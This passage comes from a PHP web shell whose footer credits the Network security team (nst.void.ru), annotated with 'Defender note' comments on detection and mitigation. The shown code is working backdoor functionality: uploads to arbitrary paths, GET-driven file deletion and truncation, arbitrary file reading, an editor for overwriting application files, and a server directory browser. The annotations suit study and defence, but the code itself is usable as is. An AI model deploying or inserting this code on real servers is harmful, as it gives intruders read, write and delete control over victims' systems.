1864 $uploadfile12 = "$where/".@$_FILES['text12']['name'];
1865 $uploadfile13 = "$where/".@$_FILES['text13']['name'];
1866 $uploadfile14 = "$where/".@$_FILES['text14']['name'];
1867 $uploadfile15 = "$where/".@$_FILES['text15']['name'];
1868 $uploadfile16 = "$where/".@$_FILES['text16']['name'];
1869 $uploadfile17 = "$where/".@$_FILES['text17']['name'];
1870 $uploadfile18 = "$where/".@$_FILES['text18']['name'];
1871 $uploadfile19 = "$where/".@$_FILES['text19']['name'];
1872 $uploadfile20 = "$where/".@$_FILES['text20']['name'];
// The str_replace() on $where after each move does not affect the printed path:
// the message uses $uploadfileN, which was built before $where is modified.
1873 if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
1874 $where=str_replace("\\\\","\\",$where);
1875 echo "<i>Uploaded to $uploadfile1</i><br>";}
1876 if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
1877 $where=str_replace("\\\\","\\",$where);
1878 echo "<i>Uploaded to $uploadfile2</i><br>";}
1879 if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
1880 $where=str_replace("\\\\","\\",$where);
1881 echo "<i>Uploaded to $uploadfile3</i><br>";}
1882 if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
1883 $where=str_replace("\\\\","\\",$where);
1884 echo "<i>Uploaded to $uploadfile4</i><br>";}
1885 if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
1886 $where=str_replace("\\\\","\\",$where);
1887 echo "<i>Uploaded to $uploadfile5</i><br>";}
1888 if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
1889 $where=str_replace("\\\\","\\",$where);
1890 echo "<i>Uploaded to $uploadfile6</i><br>";}
1891 if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
1892 $where=str_replace("\\\\","\\",$where);
1893 echo "<i>Uploaded to $uploadfile7</i><br>";}
1894 if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
1895 $where=str_replace("\\\\","\\",$where);
1896 echo "<i>Uploaded to $uploadfile8</i><br>";}
1897 if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
1898 $where=str_replace("\\\\","\\",$where);
1899 echo "<i>Uploaded to $uploadfile9</i><br>";}
1900 if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
1901 $where=str_replace("\\\\","\\",$where);
1902 echo "<i>Uploaded to $uploadfile10</i><br>";}
1903 if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
1904 $where=str_replace("\\\\","\\",$where);
1905 echo "<i>Uploaded to $uploadfile11</i><br>";}
1906 if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
1907 $where=str_replace("\\\\","\\",$where);
1908 echo "<i>Uploaded to $uploadfile12</i><br>";}
1909 if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
1910 $where=str_replace("\\\\","\\",$where);
1911 echo "<i>Uploaded to $uploadfile13</i><br>";}
1912 if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
1913 $where=str_replace("\\\\","\\",$where);
1914 echo "<i>Uploaded to $uploadfile14</i><br>";}
1915 if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
1916 $where=str_replace("\\\\","\\",$where);
1917 echo "<i>Uploaded to $uploadfile15</i><br>";}
1918 if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
1919 $where=str_replace("\\\\","\\",$where);
1920 echo "<i>Uploaded to $uploadfile16</i><br>";}
1921 if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
1922 $where=str_replace("\\\\","\\",$where);
1923 echo "<i>Uploaded to $uploadfile17</i><br>";}
1924 if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
1925 $where=str_replace("\\\\","\\",$where);
1926 echo "<i>Uploaded to $uploadfile18</i><br>";}
1927 if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
1928 $where=str_replace("\\\\","\\",$where);
1929 echo "<i>Uploaded to $uploadfile19</i><br>";}
1930 if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
1931 $where=str_replace("\\\\","\\",$where);
1932 echo "<i>Uploaded to $uploadfile20</i><br>";}
1933 }
1934 echo $copyr;
1935 exit;}
1936 
// Defender note: two destructive actions driven purely by GET parameters.
// ?yes=yes deletes "$d/$e" with unlink(); the result message is stored in
// $delresult and printed later by the file-view page.
// Because these are plain GET requests, the full path of every deleted or emptied
// file is visible in the web server's access log (d=..., e=...).
1937 if(@$_GET['yes']=="yes"){
1938 $d=@$_GET['d']; $e=@$_GET['e'];
1939 unlink($d."/".$e);
1940 $delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
1941 }
// ?clean=1 opens "$d/$e" in "w" mode, which truncates it to zero bytes, then
// redirects back to the file view. $d is not assigned in this branch; it holds
// whatever an earlier part of the script put there (NOTE(review): not visible here).
1942 if(@$_GET['clean']=="1"){
1943 @$e=$_GET['e'];
1944 $x=fopen("$d/$e","w");
1945 fwrite($x,"");
1946 echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
1947 exit;
1948 }
1949 
1950 
// Defender note: file viewer. For ?d=<dir>&e=<file> it reads the whole file and
// prints it HTML-escaped inside a <pre>, i.e. an arbitrary file read limited only
// by the permissions of the PHP account. Files whose extension is listed in
// $images (defined elsewhere in the script) are redirected to the img=1 view.
// Detection: access-log entries for this script with d= and e= pointing at
// configuration or credential files. Mitigation: open_basedir confines the
// paths PHP file functions may open.
1951 if(@$_GET['e']){
1952 $d=@$_GET['d'];
1953 $e=@$_GET['e'];
1954 $pinf=pathinfo($e);
1955 if(in_array(".".@$pinf['extension'],$images)){
1956 echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
1957 exit;}
1958 $filename="$d/$e";
1959 $fd = @fopen ($filename, "r");
1960 $c = @fread ($fd, @filesize ($filename));
1961 $c=htmlspecialchars($c);
1962 $de=$d."/".$e;
1963 $de=str_replace("//","/",$de);
1964 if(is_file($de)){
1965 if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
// Per-file action menu (delete, edit, truncate, replace, download, rename, chmod, copy).
1966 echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
1967 echo "
1968 File contents:<br>
1969 $de
1970 <br>
1971 <table width=100% border=1 cellpadding=0 cellspacing=0>
1972 <tr><td><pre>
1973 $c
1974 
1975 </pre></td></tr>
1976 </table>
1977 
1978 ";
1979 
// Delete confirmation: ?delete=1 shows a Yes/No prompt. The "Yes" link adds
// yes=yes, which the unlink() handler earlier in the file acts on before this
// page is rendered; here only its $delresult message is printed.
1980 if(@$_GET['delete']=="1"){
1981 $delete=$_GET['delete'];
1982 echo "
1983 DELETE: Are you sure?<br>
1984 <a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
1985 <br>
1986 ";
1987 if(@$_GET['yes']=="yes"){
1988 @$d=$_GET['d']; @$e=$_GET['e'];
1989 echo $delresult;
1990 }
1991 if(@$_GET['no']){
1992 echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
1993 ";
1994 }
1995 
1996 
1997 } #end of delete
1998 echo $copyr;
1999 exit;
2000 } #end of e
2001 
// Defender note: file editor (?edit=1&d=<dir>&ef=<file>). It loads the file into a
// textarea and, on POST with "save", overwrites the file with the posted text.
// Together with the upload pages this is how further PHP code can be planted in
// existing application files, so unexpected modification times or content changes
// in deployed source files are the thing to monitor (file-integrity checks,
// comparison against the deployed release).
2002 if(@$_GET['edit']=="1"){
2003 @$d=$_GET['d'];
2004 @$ef=$_GET['ef'];
2005 $e=$ef;
2006 if(is_file($d."/".$ef)){
2007 if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
2008 echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
// Current contents are read in full and HTML-escaped for display in the textarea.
2009 $filename="$d/$ef";
2010 $fd = @fopen ($filename, "r");
2011 $c = @fread ($fd, @filesize ($filename));
2012 $c=htmlspecialchars($c);
2013 $de=$d."/".$ef;
2014 $de=str_replace("//","/",$de);
2015 echo "
2016 Edit:<br>
2017 $de<br>";
2018 
// The form carries a "filename" input, but the save branch below never reads it:
// the path written is $filename built from the d and ef query parameters.
2019 if(!@$_POST['save']){
2020 print "
2021 <form method=post>
2022 <input name=filename value='$d/$ef'>
2023 <textarea cols=143 rows=30 name=editf>$c</textarea>
2024 <br>
2025 <input type=submit name=save value='Save changes'></form><br>
2026 ";
2027 }
// Save: strips magic-quotes backslashes if either setting is on, then opens the
// target in "w+" mode (truncating it) and writes the posted text. The fopen/fwrite
// results are not checked, so "File edited." is printed even when the write failed.
2028 if(@$_POST['save']){
2029 $editf=@$_POST['editf'];
2030 
2031 if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
2032 $editf=stripslashes($editf);
2033 }
2034 
2035 $f=fopen($filename,"w+");
2036 fwrite($f,"$editf");
2037 echo "<br>
2038 <b>File edited.</b>
2039 <meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
2040 exit;
2041 }
2042 echo $copyr;
2043 exit;
2044 }
2045 
2046 
2047 
// Default page: directory browser. Prints the table header, then reads every entry
// of $d (set earlier in the script) and splits the names into $dirs and $files.
// Any directory the PHP account can read is listable; open_basedir is the ini
// directive that restricts this.
2048 echo"
2049 <table width=100% cellpadding=1 cellspacing=0 class=hack>
2050 <tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
2051 ";
2052 $dirs=array();
2053 $files=array();
// On failure the script stops with a "Permission Denied ..." table instead of a PHP warning.
2054 $dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
2055 while (!(($file = readdir($dh)) === false)) {
2056 if ($file=="." || $file=="..") continue;
2057 if (@is_dir("$d/$file")) {
2058       $dirs[]=$file;
2059 }else{
2060       $files[]=$file;
2061       }
// Both arrays are re-sorted on every iteration, and $fz is assigned but not used
// in the code that follows; the directory handle is never closed.
2062    sort($dirs);
2063    sort($files);
2064 
2065 $fz=@filesize("$d/$file");
2066 }
2067 
// perm($perms): turns the integer mode returned by fileperms() into the ten-character
// string familiar from `ls -l` (for example "-rw-r--r--" or "drwxr-xr-x").
// The first character is the file type taken from the high bits of the mode,
// followed by three rwx triplets for owner, group and other.
// Returns the string; has no side effects.
2068 function perm($perms){
// File-type bits, tested from the largest mask down: s=socket, l=symlink,
// -=regular file, b=block device, d=directory, c=character device, p=FIFO, u=unknown.
2069 if (($perms & 0xC000) == 0xC000) {
2070    $info = 's';
2071 } elseif (($perms & 0xA000) == 0xA000) {
2072    $info = 'l';
2073 } elseif (($perms & 0x8000) == 0x8000) {
2074    $info = '-';
2075 } elseif (($perms & 0x6000) == 0x6000) {
2076    $info = 'b';
2077 } elseif (($perms & 0x4000) == 0x4000) {
2078    $info = 'd';
2079 } elseif (($perms & 0x2000) == 0x2000) {
2080    $info = 'c';
2081 } elseif (($perms & 0x1000) == 0x1000) {
2082    $info = 'p';
2083 } else {
2084    $info = 'u';
2085 }
// Owner triplet; bit 0x0800 (setuid) turns the execute slot into 's' or 'S'.
2086 $info .= (($perms & 0x0100) ? 'r' : '-');
2087 $info .= (($perms & 0x0080) ? 'w' : '-');
2088 $info .= (($perms & 0x0040) ?
2089            (($perms & 0x0800) ? 's' : 'x' ) :
2090            (($perms & 0x0800) ? 'S' : '-'));
// Group triplet; bit 0x0400 (setgid) turns the execute slot into 's' or 'S'.
2091 $info .= (($perms & 0x0020) ? 'r' : '-');
2092 $info .= (($perms & 0x0010) ? 'w' : '-');
2093 $info .= (($perms & 0x0008) ?
2094            (($perms & 0x0400) ? 's' : 'x' ) :
2095            (($perms & 0x0400) ? 'S' : '-'));
// Other triplet; bit 0x0200 (sticky) turns the execute slot into 't' or 'T'.
2096 $info .= (($perms & 0x0004) ? 'r' : '-');
2097 $info .= (($perms & 0x0002) ? 'w' : '-');
2098 $info .= (($perms & 0x0001) ?
2099            (($perms & 0x0200) ? 't' : 'x' ) :
2100            (($perms & 0x0200) ? 'T' : '-'));
2101 return $info;
2102 }
2103 
2104 
// One table row per sub-directory: name (as a link that browses into it),
// owner/group and the permission string from perm().
// When $os (set elsewhere in the script) is "unix", the numeric uid/gid are
// resolved to names with posix_getpwuid()/posix_getgrgid(); otherwise the raw
// numbers are shown. Row colours alternate on the index.
2105 for($i=0; $i<count($dirs); $i++){
2106 
2107 $perms = @fileperms($d."/".$dirs[$i]);
2108 $owner = @fileowner($d."/".$dirs[$i]);
2109 if($os=="unix"){
2110 $fileownera=posix_getpwuid($owner);
2111 $owner=$fileownera['name'];
2112 }
2113 $group = @filegroup($d."/".$dirs[$i]);
2114 if($os=="unix"){
2115 $groupinfo = posix_getgrgid($group);
2116 $group=$groupinfo['name'];
2117 }
2118 $info=perm($perms);
2119 if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
// Directory names are written into the HTML without escaping.
2120 $linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
2121 $linkd=str_replace("//","/",$linkd);
2122 echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
2123 }
2124 
// One table row per file: a link to the viewer, a collapsible [options] menu with
// the edit/delete/chmod/rename/download/copy actions, the size, owner/group and
// the permission string. The query-string parameter names used in these links
// (ef, edit, del_f, wich_f, chmod, rename, download, ccopy_to) are what appears
// in access logs when the actions are used.
2125 for($i=0; $i<count($files); $i++){
2126 
2127 $size=@filesize($d."/".$files[$i]);
2128 $perms = @fileperms($d."/".$files[$i]);
2129 $owner = @fileowner($d."/".$files[$i]);
2130 if($os=="unix"){
2131 $fileownera=posix_getpwuid($owner);
2132 $owner=$fileownera['name'];
2133 }
2134 $group = @filegroup($d."/".$files[$i]);
2135 if($os=="unix"){
2136 $groupinfo = posix_getgrgid($group);
2137 $group=$groupinfo['name'];
2138 }
2139 $info=perm($perms);
2140 if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
2141 
// Human-readable size. The unit thresholds mix 1024-based and decimal limits, and
// there is no branch for sizes of 1000000000000 bytes or more, in which case $siz
// keeps the value from the previous row.
2142 if ($size < 1024){$siz=$size.' b';
2143 }else{
2144 if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
2145 if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
2146 if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
2147 }}}
2148 echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
2149 }
2150 
// Closes the listing table and prints the footer held in $copyr.
2151 echo "</table></td></tr></table>";
2152 echo $copyr;
2153 
2154 ?>
2155 <!-- Network security team :: nst.void.ru -->